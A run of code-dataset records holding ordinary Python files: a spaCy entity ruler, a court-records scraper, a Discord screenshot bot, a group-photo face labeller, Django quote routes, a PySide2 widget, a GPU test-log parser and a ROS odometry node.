self.fuzzy_matcher = FuzzyMatcher(\n self.nlp.vocab, **self.defaults[\"fuzzy_defaults\"]\n )\n if self.defaults.get(\"regex_defaults\"):\n self.regex_matcher = RegexMatcher(\n self.nlp.vocab, **self.defaults[\"regex_defaults\"]\n )\n if self.defaults.get(\"token_defaults\"):\n self.token_matcher = TokenMatcher(\n self.nlp.vocab, **self.defaults[\"token_defaults\"]\n )\n self.overwrite = cfg.get(\"overwrite\", False)\n self.ent_id_sep = cfg.get(\"ent_id_sep\", DEFAULT_ENT_ID_SEP)\n else:\n self.add_patterns(cfg)\n return self\n\n def to_bytes(\n self: SpaczzRuler, *, exclude: Iterable[str] = simple_frozen_list\n ) -> bytes:\n \"\"\"Serialize the spaczz ruler patterns to a bytestring.\n\n Args:\n exclude: For spaCy consistency.\n\n Returns:\n The serialized patterns.\n\n Example:\n >>> import spacy\n >>> from spaczz.pipeline import SpaczzRuler\n >>> nlp = spacy.blank(\"en\")\n >>> ruler = SpaczzRuler(nlp)\n >>> ruler.add_patterns([{\"label\": \"AUTHOR\", \"pattern\": \"Kerouac\",\n \"type\": \"fuzzy\"}])\n >>> ruler_bytes = ruler.to_bytes()\n >>> isinstance(ruler_bytes, bytes)\n True\n \"\"\"\n serial = {\n \"overwrite\": self.overwrite,\n \"ent_id_sep\": self.ent_id_sep,\n \"patterns\": self.patterns,\n \"defaults\": self.defaults,\n }\n return srsly.msgpack_dumps(serial)\n\n def from_disk(\n self: SpaczzRuler,\n path: Union[str, Path],\n *,\n exclude: Iterable[str] = simple_frozen_list,\n ) -> SpaczzRuler:\n \"\"\"Load the spaczz ruler from a file.\n\n Expects a file containing newline-delimited JSON (JSONL)\n with one entry per line.\n\n Args:\n path: The JSONL file to load.\n exclude: For spaCy consistency.\n\n Returns:\n The loaded spaczz ruler.\n\n Example:\n >>> import os\n >>> import 
tempfile\n >>> import spacy\n >>> from spaczz.pipeline import SpaczzRuler\n >>> nlp = spacy.blank(\"en\")\n >>> ruler = SpaczzRuler(nlp)\n >>> ruler.add_patterns([{\"label\": \"AUTHOR\", \"pattern\": \"Kerouac\",\n \"type\": \"fuzzy\"}])\n >>> with tempfile.TemporaryDirectory() as tmpdir:\n >>> ruler.to_disk(f\"{tmpdir}/ruler\")\n >>> new_ruler = SpaczzRuler(nlp)\n >>> new_ruler = new_ruler.from_disk(f\"{tmpdir}/ruler\")\n >>> \"AUTHOR\" in new_ruler\n True\n \"\"\"\n path = ensure_path(path)\n self.clear()\n depr_patterns_path = path.with_suffix(\".jsonl\")\n if depr_patterns_path.is_file():\n patterns = srsly.read_jsonl(depr_patterns_path)\n self.add_patterns(patterns)\n else:\n cfg = {}\n deserializers_patterns = {\n \"patterns\": lambda p: self.add_patterns(\n srsly.read_jsonl(p.with_suffix(\".jsonl\"))\n )\n }\n deserializers_cfg = {\"cfg\": lambda p: cfg.update(srsly.read_json(p))}\n read_from_disk(path, deserializers_cfg, {})\n self.overwrite = cfg.get(\"overwrite\", False)\n self.defaults = cfg.get(\"defaults\", {})\n if self.defaults.get(\"fuzzy_defaults\"):\n self.fuzzy_matcher = FuzzyMatcher(\n self.nlp.vocab, **self.defaults[\"fuzzy_defaults\"]\n )\n if self.defaults.get(\"regex_defaults\"):\n self.regex_matcher = RegexMatcher(\n self.nlp.vocab, **self.defaults[\"regex_defaults\"]\n )\n if self.defaults.get(\"token_defaults\"):\n self.token_matcher = TokenMatcher(\n self.nlp.vocab, **self.defaults[\"token_defaults\"]\n )\n self.ent_id_sep = cfg.get(\"ent_id_sep\", DEFAULT_ENT_ID_SEP)\n read_from_disk(path, deserializers_patterns, {})\n return self\n\n def to_disk(\n self: SpaczzRuler,\n path: Union[str, Path],\n *,\n exclude: Iterable[str] = simple_frozen_list,\n ) -> None:\n \"\"\"Save the spaczz ruler patterns to a directory.\n\n The patterns will be saved as newline-delimited JSON (JSONL).\n\n Args:\n path: The JSONL file to save.\n exclude: For spaCy consistency.\n\n Example:\n >>> import os\n >>> import tempfile\n >>> import spacy\n >>> from spaczz.pipeline import SpaczzRuler\n >>> nlp = spacy.blank(\"en\")\n >>> ruler = SpaczzRuler(nlp)\n >>> ruler.add_patterns([{\"label\": \"AUTHOR\", \"pattern\": \"Kerouac\",\n \"type\": \"fuzzy\"}])\n >>> with tempfile.TemporaryDirectory() as tmpdir:\n >>> ruler.to_disk(f\"{tmpdir}/ruler\")\n >>> isdir = os.path.isdir(f\"{tmpdir}/ruler\")\n >>> isdir\n True\n \"\"\"\n path = ensure_path(path)\n cfg = {\n \"overwrite\": self.overwrite,\n \"defaults\": self.defaults,\n \"ent_id_sep\": self.ent_id_sep,\n }\n serializers = {\n \"patterns\": lambda p: srsly.write_jsonl(\n p.with_suffix(\".jsonl\"), self.patterns\n ),\n \"cfg\": lambda p: srsly.write_json(p, cfg),\n }\n if path.suffix == \".jsonl\": # user wants to save only JSONL\n srsly.write_jsonl(path, self.patterns)\n else:\n write_to_disk(path, serializers, {})\n\n def _add_patterns(\n self: SpaczzRuler,\n fuzzy_patterns: List[Dict[str, Any]],\n regex_patterns: List[Dict[str, Any]],\n token_patterns: List[Dict[str, Any]],\n ) -> None:\n \"\"\"Helper function for add_patterns.\"\"\"\n for entry in fuzzy_patterns + regex_patterns + token_patterns:\n label = entry[\"label\"]\n if \"id\" in entry:\n ent_label = label\n label = self._create_label(label, entry[\"id\"])\n self._ent_ids[label] = (ent_label, entry[\"id\"])\n pattern = entry[\"pattern\"]\n if isinstance(pattern, Doc):\n self.fuzzy_patterns[label][\"patterns\"].append(pattern)\n self.fuzzy_patterns[label][\"kwargs\"].append(entry[\"kwargs\"])\n elif isinstance(pattern, str):\n 
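# plain string patterns are routed to the regex matcher; Doc patterns above went to the fuzzy matcher\n                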
self.regex_patterns[label][\"patterns\"].append(pattern)\n self.regex_patterns[label][\"kwargs\"].append(entry[\"kwargs\"])\n elif isinstance(pattern, list):\n self.token_patterns[label].append(pattern)\n else:\n raise ValueError(\n (\n \"One or more patterns do not conform\",\n \"to spaczz pattern structure:\",\n \"{label (str), pattern (str or list), type (str),\",\n \"optional kwargs (dict[str, Any]),\",\n \"and optional id (str)}.\",\n )\n )\n for label, patterns in self.fuzzy_patterns.items():\n self.fuzzy_matcher.add(label, patterns[\"patterns\"], patterns[\"kwargs\"])\n for label, patterns in self.regex_patterns.items():\n self.regex_matcher.add(label, patterns[\"patterns\"], patterns[\"kwargs\"])\n for label, _token_patterns in self.token_patterns.items():\n self.token_matcher.add(label, _token_patterns)\n\n def _create_label(self: SpaczzRuler, label: str, ent_id: Union[str, None]) -> str:\n \"\"\"Join Entity label with ent_id if the pattern has an id attribute.\n\n Args:\n label: The entity label.\n ent_id: The optional entity id.\n\n Returns:\n The label and ent_id joined with configured ent_id_sep.\n \"\"\"\n if isinstance(ent_id, str):\n label = \"{}{}{}\".format(label, self.ent_id_sep, ent_id)\n return label\n\n def _split_label(self: SpaczzRuler, label: str) -> Tuple[str, Union[str, None]]:\n \"\"\"Split Entity label into ent_label and ent_id if it contains self.ent_id_sep.\n\n Args:\n label: The value of label in a pattern entry\n\n Returns:\n The separated ent_label and optional ent_id.\n \"\"\"\n if self.ent_id_sep in label:\n ent_label, ent_id = label.rsplit(self.ent_id_sep, 1)\n return ent_label, ent_id\n else:\n ent_label = label\n return ent_label, None\n\n @staticmethod\n def _filter_overlapping_matches(\n matches: List[Tuple[str, int, int]],\n lookup: DefaultDict[str, Dict[Tuple[str, int, int], Any]],\n ) -> Tuple[\n List[Tuple[str, int, int]], DefaultDict[str, Dict[Tuple[str, int, int], Any]]\n ]:\n \"\"\"Prevents multiple match spans from overlapping.\n\n Expects matches to be pre-sorted by matcher priority,\n with each matcher's matches being pre-sorted by descending length,\n then ascending start index, then descending match score\n If more than one match span includes the same tokens\n the first of these match spans in matches is kept.\n\n It also removes non-kept matches from the lookup dict as well.\n\n Args:\n matches: List of match span tuples\n (match_id, start_index, end_index).\n lookup: Match ratio, count and detail values in\n a `defaultdict(dict)`.\n\n Returns:\n The filtered list of match span tuples.\n \"\"\"\n filtered_matches: List[Tuple[str, int, int]] = []\n for match in matches:\n if not set(range(match[1], match[2])).intersection(\n chain(*[set(range(n[1], n[2])) for n in filtered_matches])\n ):\n filtered_matches.append(match)\n if match in lookup[\"ratios\"]:\n _ = lookup[\"counts\"].pop(match, None)\n _ = lookup[\"details\"].pop(match, None)\n elif match in lookup[\"counts\"]:\n _ = lookup[\"details\"].pop(match, None)\n return filtered_matches, lookup\n\n @staticmethod\n def _update_custom_attrs(\n span: Span,\n match_id: str,\n lookup: DefaultDict[str, Dict[Tuple[str, int, int], Any]],\n ) -> Span:\n \"\"\"Update custom attributes for matches.\"\"\"\n ratio = lookup[\"ratios\"].get((match_id, span.start, span.end))\n counts = lookup[\"counts\"].get((match_id, span.start, span.end))\n details = lookup[\"details\"].get((match_id, span.start, span.end))\n for token in span:\n token._.spaczz_token = True\n if ratio:\n token._.spaczz_ratio = 
ratio\n token._.spaczz_type = \"fuzzy\"\n elif counts:\n token._.spaczz_counts = counts\n token._.spaczz_type = \"regex\"\n elif details:\n token._.spaczz_details = details\n token._.spaczz_type = \"token\"\n return span\n","sub_path":"src/spaczz/pipeline/_spaczzruler.py","file_name":"_spaczzruler.py","file_ext":"py","file_size_in_byte":36072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"75990840","text":"#!venv/bin/python\n\n# THESE ARE LEGACY FUNCTIONS THAT ARE NOT USED IN THE WORKING APPLICATION. \n# THEY ARE STORED FOR REFERENCE AND IN CASE WE REVERT BACK TO SEARCHING FOR CASES USING THIS METHOD\n\nfrom bs4 import BeautifulSoup \nimport random \nimport pandas as pd\nimport urllib\nimport string\nimport requests\nimport time\nimport csv\n\n# Using the search page, enters combinations of year, first initial, and beginning 2 chars of last initials\n# ~170000 combinations\ndef generate_search_links():\n url_begin= \"http://www.ma-appellatecourts.org/search_party.php?pln=\"\n url_end = \"&dsc=&ddt=cr&dtp=&sort=&get=Search\"\n # last name is two chars, first name is one, year ranges from past decade\n # http://www.ma-appellatecourts.org/search_party.php?pln=jo&pfn=j&dfy=2017&dsc=&ddt=cr&dtp=&sort=&get=Search\n search_list = []\n for year in ['2008', '2009', '2010', '2011', '2012', '2013', '2014', '2015', '2016', '2017']:\n for first_initial in string.ascii_lowercase: # A\n for last_initial_1 in string.ascii_lowercase: # A\n for last_initial_2 in string.ascii_lowercase: # a,b,c\n last_name = last_initial_1 + last_initial_2\n current_url = url_begin + last_name + \"&pfn=\" + first_initial + \"&dfy=\" + year + url_end\n search_list.append(current_url)\n print(current_url)\n return search_list\n\n# Unused: Parses through the auxiliary search page\ndef scrapable(link, headers):\n\t# result = requests.get(link)\n\tdno = link.split(\"dno=\")[1]\n\tif (dno[:2] == 'BD'):\n\t\treturn False\n\tpage = ''\n\twhile page == '':\n\t\ttry:\n\t\t\tpage = requests.get(link, headers)\n\t\t\ttime.sleep(2)\n\t\texcept:\n\t\t\tprint(\"Connection refused by the server..\")\n\t\t\tprint(\"Let me sleep for 1 seconds\")\n\t\t\tprint(\"ZZzzzz...\")\n\t\t\ttime.sleep(1)\n\t\t\tprint(\"Was a nice sleep, now let me continue...\")\n\t\t\tcontinue\n\t\t\t\n\tc = page.content\t\n\tsoup = BeautifulSoup(c,'html.parser')\n\thome = soup.find(\"td\",class_=\"home\")\n\tif (home.find(\"font\").text == 'No matches found!'):\n\t\treturn False\n\telse:\n\t\treturn True\n\n# Unused: Parses through the auxiliary search page\ndef scrapable_2(link):\n\t# result = requests.get(link)\n\tdno = link.split(\"dno=\")[1]\n\tif (dno[:2] == 'BD'): # TODO: add check for OE as well, FAR, DAR\n\t\treturn False\n\n\tpage = ''\n\twhile page == '':\n\t\ttry:\n\t\t\tpage = requests.get(link)\n\t\t\t# time.sleep(2)\n\t\texcept:\n\t\t\tprint(\"Connection refused by the server..\")\n\t\t\tprint(\"Let me sleep for 1 seconds\")\n\t\t\tprint(\"ZZzzzz...\")\n\t\t\ttime.sleep(1)\n\t\t\tprint(\"Was a nice sleep, now let me continue...\")\n\t\t\tcontinue\n\t\t\t\n\tc = page.content\t\n\tsoup = BeautifulSoup(c,'html.parser')\n\thome = soup.find(\"td\",class_=\"home\")\n\tif (home.find(\"font\") is None):\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef name_scrape(url,headers):\n\n\t# http_proxy = \"192.241.129.174\"\n\t# proxyDict = {\n\t# \t\t\t\"http\" : http_proxy\n\t# \t\t}\n\tbase = \"http://www.ma-appellatecourts.org/\"\n\tbase = url[:34]\n\tpre = url[:57] + \"&psx\" + url[57:63] + 
\"&dfy=&dsc=&ddt=&dtp=&sort=&\"\n\tpost = \"&get=Next+List\"\n\tstill_more = True \n\n\t# http://www.ma-appellatecourts.org/search_party.php?pln=ja&psx=&pfn=j&dfy=&dsc=&ddt=&dtp=&sort=&set=0&get=Next+List\n\t# http://www.ma-appellatecourts.org/search_party.php?pln=ja&pfn=&psx=j&dfy=&dsc=&ddt=&dtp=&sort=&set=0&get=Next+List\n\n\tsearch_results = []\n\n\twhile(still_more):\n\t\tprint(url)\n\t\tstill_more = False\n\t\tpage = ''\n\t\twhile page == '':\n\t\t\ttry:\n\t\t\t\tpage = requests.get(url, headers)\n\t\t\texcept:\n\t\t\t\tprint(\"Connection refused by the server..\")\n\t\t\t\tprint(\"Let me sleep for 1 seconds\")\n\t\t\t\tprint(\"ZZzzzz...\")\n\t\t\t\ttime.sleep(1)\n\t\t\t\tprint(\"Was a nice sleep, now let me continue...\")\n\t\t\t\tcontinue\n\n\t\tc = page.content\n\t\tsoup = BeautifulSoup(c,'html.parser')\n\t\ttable = soup.find(\"table\")\n\t\tresult_table = table.find_all(\"table\", class_=\"search_result\")\n\n\t\tfor result in result_table:\n\t\t\tappend = result.a[\"href\"] \n\t\t\tlink = base + append\t\n\t\t\tprint(link)\n\t\t\tinfo = soup_scrape(link,headers)\n\t\t\tsearch_results.append(info)\n\t\t\n\t\tform = soup.find(\"form\")\n\t\tinputs = form.find_all(\"input\")\n\n\t\tfor inp in inputs :\n\t\t\tif inp[\"name\"] == \"set\":\n\t\t\t\tset_num = inp[\"value\"]\n\t\t\t\tprint(set_num)\n\t\t\tif inp[\"value\"] == \"Next List\":\n\t\t\t\tstill_more = True\n\t\t\t\tbreak\n\n\t\tif(still_more):\n\t\t\turl = pre + \"set=\" + set_num + post \n\t\n\treturn search_results","sub_path":"search_functions.py","file_name":"search_functions.py","file_ext":"py","file_size_in_byte":4186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"521846833","text":"import numpy as np\n\nclass TextMap:\n\t\"\"\"\n\t\tA map of words to numbers. \n\t\tEverytime a new word -- aka word not found on dict -- is presented to get_id\n\t\ta new key of this word is created and associated with a unique integer number.\n\t\tIf a known word is presented than the number retrieved is the associated one. \n\t\"\"\"\n\tdef __init__(self, name, init_counter=1):\n\t\tself.name = name\n\t\tself.counter = init_counter\n\t\tself.map = {}\n\n\tdef increment(self):\n\t\tself.counter = self.counter + 1\n\n\tdef get_int(self):\n\t\treturn self.counter\n\n\tdef get_id(self, word):\n\t\tif word in self.map:\n\t\t\treturn self.map[word]\n\t\telse:\n\t\t\tself.map.update({ word : self.get_int() })\n\t\t\tself.increment()\n\t\t\tprint('don\\'t exist ', word, ' - ', self.map.get(word))\n\t\t\treturn self.map.get(word)\n\nclass MatrixTextToFloatConverter:\n\t\"\"\"\n\t\tTransform strings in a matrix into int numbers. Uses an internal dictionary to map words to numbers. 
\n\t\"\"\"\n\tdef __init__(self, original_matrix, init_index=1, exclude_columns=[]):\n\t\tself.original = original_matrix\n\t\tself.altered = []\n\t\tself.map = TextMap('MatrixTextToIntConverter', init_counter=init_index)\n\t\tself.excluded_columns = exclude_columns\n\n\n\tdef is_number(self, item):\n\t\tnumber = True\n\t\ttry:\n\t\t\tfloat(item)\n\t\texcept ValueError:\n\t\t\tnumber = False\n\t\treturn number\n\n\tdef ret(self):\n\t\treturn self.map\n\t\t\t\n\n\tdef execute(self):\n\t\titem = None\n\t\tfor row_idx, row in enumerate(self.original):\n\n\t\t\tvect = []\n\n\t\t\tfor col_idx, col in enumerate(row):\n\t\t\t\t\n\t\t\t\titem = col\n\n\t\t\t\tif not self.is_number(item) and not col_idx in self.excluded_columns:\n\t\t\t\t\titem = self.map.get_id(item)\n\n\t\t\t\tvect.append(item)\n\n\t\t\tself.altered.append(vect)\n\t\t\t\n\n\t\treturn self.altered\n\t\t\t\n\n\n\n","sub_path":"textToNumber.py","file_name":"textToNumber.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"453619361","text":"from selenium import webdriver\nfrom pathlib import Path\n\nimport time\nimport discord\nfrom discord.ext import commands\n\n\nclass Wait():\n def __init__(self):\n self.time = 0\n self.cool = 60*60\n def getWait(self):\n if (time.time() - self.time) > self.cool:\n self.time = time.time()\n return True\n else:\n return False\n\n\ntoken = 'YOUR TOKEN'\nbot = commands.Bot(command_prefix = '!')\n\n@bot.command(aliases=['v','w','vær'])\nasync def weather(ctx):\n if weit.getWait():\n await scrshot()\n with open('cap.png', 'rb') as img:\n await ctx.send(file=discord.File(img))\n\n@bot.event\nasync def on_message(message):\n print(message.content)\n await bot.process_commands(message)\n\nasync def scrshot():\n driverPath = 'C:_URPATH_\\\\geckodriver.exe'\n driver = webdriver.Firefox(executable_path=driverPath)\n cssPath = 'SOME CSS PATH TO AN ELEMENT U WANT TO CAPTURE'\n\n driver.get('SOME URL')\n elem = driver.find_element_by_css_selector(cssPath)\n elem.screenshot('cap.png')\n driver.quit()\n\nweit = Wait()\nbot.run(token)\n\n\n","sub_path":"botzo.py","file_name":"botzo.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"570104589","text":"# Import required packages\nimport face_recognition\nimport cv2\nimport numpy as np\nimport scipy.misc\nimport os\n\n# Get filenames from all pictures in the groepsfoto directory\nimage_file_names = os.listdir('./groepsfoto/')\n\n# Make a dictionay with the names of the people and their respective picture\npic_name_dict = {}\nfor img in image_file_names:\n pic_name_dict[img[:-5]] = img\n\n# Initiate empty dictionary for face encodings\nface_encodings_dict = {}\n\n# Encode known faces\nfor name in pic_name_dict:\n image = face_recognition.load_image_file(\"groepsfoto/\" + pic_name_dict[name])\n face_encodings_dict[name] = face_recognition.face_encodings(image)[0]\n\n# Save face encodings as a list\nknown_faces = [face_encodings_dict[name] for name in face_encodings_dict]\n\n# Save names as list\nname_list = list(pic_name_dict.keys())\n\n# Import group picture\nframe = face_recognition.load_image_file(\"groepsfoto.jpg\")\n\n# Find all the faces and face encodings in the current frame of video\nface_locations = face_recognition.face_locations(frame)\nface_encodings = face_recognition.face_encodings(frame, face_locations, num_jitters=5)\n\n# Add face names to the right locations 
based on matching with our pictures\nface_names = []\nfor face_encoding in face_encodings:\n match_scores = face_recognition.face_distance(known_faces, face_encoding)\n\n name = None\n if min(match_scores) <= 0.5: # Threshold for match\n name = name_list[np.argmin(match_scores)]\n\n face_names.append(name)\n\n# Label the results\nfor (top, right, bottom, left), name in zip(face_locations, face_names):\n if not name:\n continue\n\n # Draw a box around the face\n cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)\n\n # Draw a label with a name below the face\n cv2.rectangle(frame, (left, bottom - 25), (right, bottom), (0, 0, 255), cv2.FILLED)\n font = cv2.FONT_HERSHEY_DUPLEX\n cv2.putText(frame, name, (left + 6, bottom - 6), font, 0.5, (255, 255, 255), 1)\n\n# Display the resulting frame\nscipy.misc.toimage(frame).show()\n\n# Save resulting frame when happy\nscipy.misc.imsave('groepsfoto_FRed.png', frame)\n\n\n\n\n\n\n\n\n","sub_path":"groepsfoto_FR.py","file_name":"groepsfoto_FR.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"265220205","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns =[\n url(r'^addquote/$', views.addquote, name='addquote'),\n url(r'^getquote/$', views.getquote, name='getquote'),\n url(r'^getquotebyuser/$', views.getquotebyuser, name='getquotebyuser'),\n url(r'^getallquotesbyuser/$', views.getallquotesbyuser, name='getallquotesbyuser'),\n url(r'^deletequote/$', views.deletequote, name='deletequote'),\n url(r'^updatequote/$', views.updatequote, name='updatequote'),\n url(r'^searchquotes/$',views.searchquotes, name='searchquotes')\n ]\n","sub_path":"api/quotes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"229578506","text":"from PySide2.QtWidgets import *\nfrom PySide2.QtGui import *\nimport random\n\nclass Cycles(QWidget):\n def __init__(self):\n QWidget.__init__(self)\n self.setWindowTitle(\"Cycles de l'ISEN Yncrea Ouest\")\n self.setMinimumSize(600,400)\n self.layout = QVBoxLayout()\n self.Button=QPushButton(\"Changer le cycle\")\n\n self.text=QLabel()\n\n self.layout.addWidget(self.text)\n self.layout.addWidget(self.Button)\n\n self.Button.clicked.connect(self.randomlabel)\n\n\n self.setLayout(self.layout)\n\n\n def randomlabel(self):\n liste=[\"CSI\", \"CIR\", \"BIOST\", \"CENT\", \"BIAST\", \"EST\"]\n text=random.choice(liste)\n print(text)\n self.text.setText(text)\n\n\n\n\n\n\nif __name__ == \"__main__\":\n app = QApplication([])\n win = Cycles()\n win.show()\n app.exec_()\n\n","sub_path":"Ex1.py","file_name":"Ex1.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"132291418","text":"import sys\nimport re\nimport pdb\nimport os.path\n\n#res_path = \"/Users/tylersorensen/Documents/Github/fp_repo2/Amber-Testing-Framework/Driver_and_Comparator_Results\"\nres_path = \"/home/tsorensen/github/Amber-Testing-Framework_ssh/Amber-Testing-Framework/Driver_and_Comparator_Results\"\n\nVENDOR = \"CUDA\"\n\n# Pass in the input log\nassert(len(sys.argv) == 2)\nfname = sys.argv[1]\n\ndef get_file_contents(fname):\n f = open(fname)\n data = f.read()\n f.close()\n return data\n\nraw_data = get_file_contents(fname)\n\ndname = fname.split(\"/\")[-1].replace(\".txt\",\"\")\nprint(dname)\n\n\ntests = 
raw_data.split(\"Running \")[1:]\nprint(tests[0])\n\ndef get_hueristic(t):\n if \"chunked\" in t:\n return \"chunked\"\n if \"round_robin\" in t:\n return \"round_robin\"\n if \"plain\" in t:\n return \"plain\"\n assert(0)\n\ndef get_run(t):\n if \"2t_2i\" in t:\n return \"2t_2i\"\n if \"2t_3i\" in t:\n return \"2t_3i\"\n if \"2t_4i\" in t:\n return \"2t_4i\"\n if \"3t_3i\" in t:\n return \"3t_3i\"\n if \"3t_4i\" in t:\n return \"3t_4i\"\n assert(0)\n\ndef get_killed_success(t):\n #pdb.set_trace()\n #print(t)\n k = re.search(\"killed: (\\d+)\",t)[1]\n s = re.search(\"Success: (\\d+)\",t)[1]\n return k,s\n\ndef get_id(t):\n first_line = t.split(\"\\n\")[0]\n to_return = first_line.split(\"_\")[-1]\n #print(to_return)\n return to_return \n\nresults = {\"3t_4i\" : [],\n \"3t_3i\" : [],\n \"2t_2i\" : [],\n \"2t_3i\" : [],\n \"2t_4i\" : []}\n\nresult_map = {\"3t_4i\" : \"3_thread_4_instruction\",\n \"3t_3i\" : \"3_thread_3_instruction\",\n \"2t_2i\" : \"2_thread_2_instruction\",\n \"2t_3i\" : \"2_thread_3_instruction\",\n \"2t_4i\" : \"2_thread_4_instruction\"}\n\n\nruns = set()\n \nfor t in tests:\n h = get_hueristic(t)\n r = get_run(t)\n i = get_id(t)\n runs.add(r)\n k,s = get_killed_success(t)\n results[r].append((i,h,k,s))\n\ndef get_entry(i, d, h):\n for e in d:\n if e[0] == str(i) and e[1] == h:\n k = int(e[2])\n s = int(e[3])\n total = k + s\n if s == total:\n return \"P\",0\n else:\n return \"F (\" + str(k) + \"/\" + str(total) + \")\",k\n\n assert(0)\n \n\nfor r in runs:\n csv = [\"Test File Name,No saturation Result,Round Robin Saturation Result,Chunking Saturation Result,All Passed\"]\n\n total_e = 0\n total_rr = 0\n total_c = 0\n total_ap = 0\n #if (r == '3t_3i'):\n # pdb.set_trace()\n for i in range(len(results[r])):\n name = str(i)\n e,t = get_entry(i, results[r], \"plain\")\n total_e += t\n \n #rr,t = get_entry(i, results[r], \"round_robin\")\n rr = \"P\"\n total_rr += 0\n \n #c,t = get_entry(i, results[r], \"chunked\")\n c = \"P\"\n total_c += 0\n\n ap = \"F\"\n total_ap += 1\n if e == \"P\":\n ap = \"P\"\n total_ap -= 1\n line = \",\".join([name,e,rr,c, ap])\n csv.append(line)\n sum_line = \"Total failures:,\"+ \",\".join([str(total_e), str(total_rr), str(total_c), str(total_ap)])\n csv.append(sum_line)\n\n #if r == '3t_3i':\n # pdb.set_trace()\n fname = dname + \".csv\"\n fname = os.path.join(res_path, result_map[r], VENDOR, fname)\n print(fname)\n f = open(fname,'w')\n f.write(\"\\n\".join(csv))\n f.close()\n","sub_path":"extra_scripts/parse_subgroup_logs.py","file_name":"parse_subgroup_logs.py","file_ext":"py","file_size_in_byte":3336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"428819428","text":"#!/usr/bin/env python\nimport rospy\nimport tf\nfrom geometry_msgs.msg import PoseStamped\nfrom nav_msgs.msg import Odometry\n\n\nclass SimuNav:\n def __init__(self):\n self.nav_to_robot = tf.TransformBroadcaster()\n self.robot_to_laser = tf.TransformBroadcaster()\n self.odom_publisher = rospy.Publisher('odom', Odometry, queue_size=10)\n\n def broadcast_odom(self, pose_msg):\n position = (pose_msg.pose.position.x, pose_msg.pose.position.y, pose_msg.pose.position.z)\n orientation = (pose_msg.pose.orientation.x, pose_msg.pose.orientation.y,\n pose_msg.pose.orientation.z, pose_msg.pose.orientation.w)\n self.nav_to_robot.sendTransform(position,\n orientation,\n rospy.Time.now(),\n \"base_link\",\n \"odom\")\n\n odom = Odometry()\n odom.header.stamp = rospy.Time.now()\n odom.header.frame_id = \"odom\"\n\n 
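# copy the SLAM pose into the odometry message verbatim (position and orientation)\n        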
odom.pose.pose.position.x = pose_msg.pose.position.x\n odom.pose.pose.position.y = pose_msg.pose.position.y\n odom.pose.pose.position.z = pose_msg.pose.position.z\n\n odom.pose.pose.orientation.x = pose_msg.pose.orientation.x\n odom.pose.pose.orientation.y = pose_msg.pose.orientation.y\n odom.pose.pose.orientation.z = pose_msg.pose.orientation.z\n odom.pose.pose.orientation.w = pose_msg.pose.orientation.w\n\n odom.child_frame_id = \"base_link\"\n odom.twist.twist.linear.x = 0.0\n odom.twist.twist.linear.y = 0.0\n odom.twist.twist.angular.z = 0.0\n\n self.odom_publisher.publish(odom)\n\n def broadcast_static_transform(self):\n self.robot_to_laser.sendTransform((0, 0, 0),\n tf.transformations.quaternion_from_euler(0, 0, 0),\n rospy.Time.now(),\n \"laser\",\n \"base_link\")\n\n def setup_node(self):\n rospy.init_node('simu_nav_node')\n rospy.Subscriber(\"slam_out_pose\", PoseStamped, self.broadcast_odom)\n print(\"Ready to transform\")\n\n rate = rospy.Rate(10)\n while not rospy.is_shutdown():\n self.broadcast_static_transform()\n rate.sleep()\n\n\nif __name__ == '__main__':\n broadcaster = SimuNav()\n broadcaster.setup_node()","sub_path":"navigation/scripts/simu_nav_node.py","file_name":"simu_nav_node.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"460526700","text":"# -*- coding: utf-8 -*-\n\nfrom db.models.account import User, UserInfo\n\n\nclass UserResourceAPIMixin(object):\n \"\"\"为请求处理器提供操作用户资源的API\n\n 要求宿主类实现`.db.session`来访问SQLAlchemy的数据库session。\n 要求宿主类实现`.current_user`来访问当前用户登录的session。\n \"\"\"\n\n def user_info_check(self, form):\n \"\"\"用户个人信息检查\"\"\"\n result = {\"status\": 400, \"message\": \"Failed\", \"data\": {}}\n if form[\"url\"]:\n if not (form[\"url\"].startswith(\"http://\") or\n form[\"url\"].startswith(\"https://\")):\n form[\"url\"] = \"http://\" + form[\"url\"]\n form[\"nickname\"] = form[\"nickname\"] or self.current_user.username\n if len(form[\"nickname\"]) > User.nickname.type.length:\n result[\"data\"] = {\n \"field\": \"nickname\",\n \"message\": \"昵称不能超过{}个字符!\".format(\n User.nickname.type.length)\n }\n elif len(form[\"school\"]) > UserInfo.school.type.length:\n result[\"data\"] = {\n \"field\": \"school\",\n \"message\": \"学校不能超过{}个字符!\".format(\n UserInfo.school.type.length)\n }\n elif len(form[\"major\"]) > UserInfo.major.type.length:\n result[\"data\"] = {\n \"field\": \"major\",\n \"message\": \"专业不能超过{}个字符!\".format(\n UserInfo.major.type.length)\n }\n elif len(form[\"url\"]) > UserInfo.url.type.length:\n result[\"data\"] = {\n \"field\": \"url\", \"message\": \"个人网址不能超过{}个字符!\".format(\n UserInfo.url.type.length)\n }\n elif len(form[\"about\"]) > UserInfo.about.type.length:\n result[\"data\"] = {\n \"field\": \"about\",\n \"message\": \"个人简介不能超过{}个字符!\".format(\n UserInfo.about.type.length)\n }\n else:\n return {\"status\": 200, \"message\": \"OK\"}\n return result\n\n pass\n","sub_path":"application/account/utils/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"103524001","text":"from flask import request, 